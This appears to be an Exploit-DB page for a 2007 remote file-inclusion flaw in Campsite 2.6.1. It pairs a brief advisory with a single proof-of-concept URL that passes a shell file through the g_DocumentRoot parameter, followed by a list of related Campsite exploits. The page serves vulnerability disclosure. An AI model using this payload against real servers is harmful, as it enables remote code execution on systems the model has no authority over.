Exploit

EDB-ID: 29987	Author: anonymous	Published: 2007-05-08
CVE: CVE-2006-5911	Type: Webapps	Platform: PHP
Aliases: N/A	Advisory/Source: Link	Tags: N/A
E-DB Verified:	Exploit: Download / View Raw	Vulnerable App: N/A

« Previous Exploit Next Exploit »

source: http://www.securityfocus.com/bid/23874/info
                     
Campsite is prone to multiple remote file-include vulnerabilities.
                     
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
                     
This issue affects Campsite 2.6.1. Earlier versions may also be affected.

http://www.example.com/classes/Publication.php?g_DocumentRoot=shell.txt?

Related Exploits

Trying to match CVEs (1): CVE-2006-5911
Trying to match OSVDBs (1): 34209
Other Possible E-DB Search Terms: Campsite 2.6.1, Campsite

Date	Title	Author
2010-04-30	Campsite 3.x - 'article_id' SQL Injection	Stefan Esser
2010-07-15	Campsite CMS - Remote Persistent Cross-Site Scripting	D4rk357
2010-07-12	Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities	10n1z3d
2007-05-08	Campsite 2.6.1 - 'Alias.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'article.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'ArticleAttachment.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'ArticleComment.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'ArticleData.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'ArticleImage.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'ArticleIndex.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'ArticlePublish.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'ArticleTopic.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'ArticleType.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'ArticleTypeField.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'Country.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'DatabaseObject.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'Event.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'image.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'implementation/Management/configuration.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'implementation/Management/db_connect.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'IPAccess.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'issue.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'IssuePublish.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'Language.php?g_documentRoot' Remote File Inclusion	anonymous
2007-05-08	Campsite 2.6.1 - 'LocalizerConfig.php?g_documentRoot' Remote File Inclusion	anonymous

Campsite 2.6.1 - 'Publication.php?g_documentRoot' Remote File Inclusion

Related Exploits